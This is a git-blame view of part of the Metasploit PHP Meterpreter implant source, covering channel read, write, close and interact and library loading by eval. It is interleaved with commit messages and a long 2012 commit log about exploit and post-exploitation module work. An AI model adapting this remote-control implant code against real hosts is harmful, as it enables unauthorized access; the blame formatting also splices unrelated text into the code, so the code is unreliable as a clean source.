|
|
$len_tlv = packet_get_tlv($req, TLV_TYPE_LENGTH);
|
|
|
|
$id = $chan_tlv['value'];
|
|
|
|
$len = $len_tlv['value'];
|
|
|
|
$data = channel_read($id, $len);
|
|
|
|
if ($data === false) {
|
|
|
|
$res = ERROR_FAILURE;
|
|
|
|
} else {
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_DATA, $data));
|
|
|
|
$res = ERROR_SUCCESS;
|
|
|
|
}
|
|
|
|
return $res;
|
|
|
|
}
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
# Works
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
function core_channel_write($req, &$pkt) {
|
2011-01-10 09:04:17 +01:00
|
|
|
#my_print("doing channel write");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
|
|
|
|
$data_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_DATA);
|
|
|
|
$len_tlv = packet_get_tlv($req, TLV_TYPE_LENGTH);
|
|
|
|
$id = $chan_tlv['value'];
|
|
|
|
$data = $data_tlv['value'];
|
|
|
|
$len = $len_tlv['value'];
|
|
|
|
|
|
|
|
$wrote = channel_write($id, $data, $len);
|
|
|
|
if ($wrote === false) {
|
|
|
|
return ERROR_FAILURE;
|
|
|
|
} else {
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, $wrote));
|
|
|
|
return ERROR_SUCCESS;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2011-06-30 12:28:04 +02:00
|
|
|
#
|
2013-04-26 22:12:37 +02:00
|
|
|
# This is called when the client wants to close a channel explicitly. Not to be confused with
|
2011-06-30 12:28:04 +02:00
|
|
|
#
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
function core_channel_close($req, &$pkt) {
|
2011-01-10 09:04:17 +01:00
|
|
|
global $channel_process_map;
|
2010-06-08 09:59:36 +02:00
|
|
|
# XXX remove the closed channel from $readers
|
2010-06-03 00:43:03 +02:00
|
|
|
my_print("doing channel close");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
|
|
|
|
$id = $chan_tlv['value'];
|
|
|
|
|
|
|
|
$c = get_channel_by_id($id);
|
|
|
|
if ($c) {
|
|
|
|
# We found a channel, close its stdin/stdout/stderr
|
2011-02-18 01:24:18 +01:00
|
|
|
channel_close_handles($id);
|
|
|
|
|
2011-06-30 12:28:04 +02:00
|
|
|
# This is an explicit close from the client, always remove it from the
|
|
|
|
# list, even if it has data.
|
|
|
|
channel_remove($id);
|
|
|
|
|
2011-02-18 01:24:18 +01:00
|
|
|
# if the channel we're closing is associated with a process, kill the
|
|
|
|
# process
|
2011-01-10 09:04:17 +01:00
|
|
|
# Make sure the stdapi function for closing a process handle is
|
|
|
|
# available before trying to clean up
|
|
|
|
if (array_key_exists($id, $channel_process_map) and is_callable('close_process')) {
|
|
|
|
close_process($channel_process_map[$id]);
|
2010-06-15 01:20:57 +02:00
|
|
|
}
|
2010-06-03 00:43:03 +02:00
|
|
|
return ERROR_SUCCESS;
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
2011-05-13 03:22:53 +02:00
|
|
|
dump_channels("after close");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
2010-06-03 00:43:03 +02:00
|
|
|
return ERROR_FAILURE;
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
|
|
|
|
2013-04-26 22:12:37 +02:00
|
|
|
#
|
2011-02-18 01:24:18 +01:00
|
|
|
# Destroy a channel and all associated handles.
|
|
|
|
#
|
|
|
|
function channel_close_handles($cid) {
|
|
|
|
global $channels;
|
|
|
|
|
|
|
|
# Sanity check - make sure a channel with the given cid exists
|
|
|
|
if (!array_key_exists($cid, $channels)) {
|
|
|
|
return;
|
|
|
|
}
|
|
|
|
$c = $channels[$cid];
|
|
|
|
for($i = 0; $i < 3; $i++) {
|
|
|
|
#my_print("closing channel fd $i, {$c[$i]}");
|
|
|
|
if (array_key_exists($i, $c) && is_resource($c[$i])) {
|
|
|
|
close($c[$i]);
|
|
|
|
# Make sure the main loop doesn't select on this resource after we
|
|
|
|
# close it.
|
|
|
|
remove_reader($c[$i]);
|
|
|
|
}
|
|
|
|
}
|
2011-06-30 12:28:04 +02:00
|
|
|
|
|
|
|
# axe it from the list only if it doesn't have any leftover data
|
|
|
|
if (strlen($c['data']) == 0) {
|
|
|
|
channel_remove($cid);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
function channel_remove($cid) {
|
|
|
|
global $channels;
|
2011-02-18 01:24:18 +01:00
|
|
|
unset($channels[$cid]);
|
|
|
|
}
|
|
|
|
|
2010-06-13 18:44:22 +02:00
|
|
|
function core_channel_interact($req, &$pkt) {
|
|
|
|
global $readers;
|
|
|
|
|
|
|
|
my_print("doing channel interact");
|
|
|
|
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
|
|
|
|
$id = $chan_tlv['value'];
|
|
|
|
|
|
|
|
# True means start interacting, False means stop
|
|
|
|
$toggle_tlv = packet_get_tlv($req, TLV_TYPE_BOOL);
|
|
|
|
|
|
|
|
$c = get_channel_by_id($id);
|
|
|
|
if ($c) {
|
|
|
|
if ($toggle_tlv['value']) {
|
2010-06-14 07:01:37 +02:00
|
|
|
# Start interacting. If we're already interacting with this
|
|
|
|
# channel, it's an error and we should return failure.
|
2010-06-13 18:44:22 +02:00
|
|
|
if (!in_array($c[1], $readers)) {
|
2010-06-14 07:01:37 +02:00
|
|
|
# stdout
|
2010-06-13 18:44:22 +02:00
|
|
|
add_reader($c[1]);
|
2011-02-18 01:24:18 +01:00
|
|
|
# Make sure we don't add the same resource twice in the case
|
|
|
|
# that stdin == stderr
|
2010-06-15 01:20:57 +02:00
|
|
|
if (array_key_exists(2, $c) && $c[1] != $c[2]) {
|
2011-02-18 01:24:18 +01:00
|
|
|
# stderr
|
2010-06-14 07:01:37 +02:00
|
|
|
add_reader($c[2]);
|
|
|
|
}
|
2010-06-13 18:44:22 +02:00
|
|
|
$ret = ERROR_SUCCESS;
|
|
|
|
} else {
|
|
|
|
# Already interacting
|
|
|
|
$ret = ERROR_FAILURE;
|
|
|
|
}
|
|
|
|
} else {
|
2010-06-14 07:01:37 +02:00
|
|
|
# Stop interacting. If we're not interacting yet with this
|
|
|
|
# channel, it's an error and we should return failure.
|
2010-06-13 18:44:22 +02:00
|
|
|
if (in_array($c[1], $readers)) {
|
2010-06-14 07:01:37 +02:00
|
|
|
remove_reader($c[1]); # stdout
|
|
|
|
remove_reader($c[2]); # stderr
|
2010-06-13 18:44:22 +02:00
|
|
|
$ret = ERROR_SUCCESS;
|
|
|
|
} else {
|
2011-01-10 09:04:17 +01:00
|
|
|
# Not interacting. This is technically failure, but it seems
|
|
|
|
# the client sends us two of these requests in quick succession
|
|
|
|
# causing the second one to always return failure. When that
|
|
|
|
# happens we fail to clean up properly, so always return
|
|
|
|
# success here.
|
|
|
|
$ret = ERROR_SUCCESS;
|
2010-06-13 18:44:22 +02:00
|
|
|
}
|
|
|
|
}
|
|
|
|
} else {
|
|
|
|
# Not a valid channel
|
2011-01-10 09:04:17 +01:00
|
|
|
my_print("Trying to interact with an invalid channel");
|
2010-06-13 18:44:22 +02:00
|
|
|
$ret = ERROR_FAILURE;
|
|
|
|
}
|
|
|
|
return $ret;
|
|
|
|
}
|
|
|
|
|
2011-06-30 12:28:04 +02:00
|
|
|
function interacting($cid) {
|
|
|
|
global $readers;
|
|
|
|
$c = get_channel_by_id($cid);
|
|
|
|
if (in_array($c[1], $readers)) {
|
|
|
|
return true;
|
|
|
|
}
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
function core_shutdown($req, &$pkt) {
|
|
|
|
my_print("doing core shutdown");
|
|
|
|
die();
|
|
|
|
}
|
|
|
|
|
2010-06-23 22:00:27 +02:00
|
|
|
# zlib support is not compiled in by default, so this makes sure the library
|
|
|
|
# isn't compressed before eval'ing it
|
|
|
|
# TODO: check for zlib support and decompress if possible
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
function core_loadlib($req, &$pkt) {
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
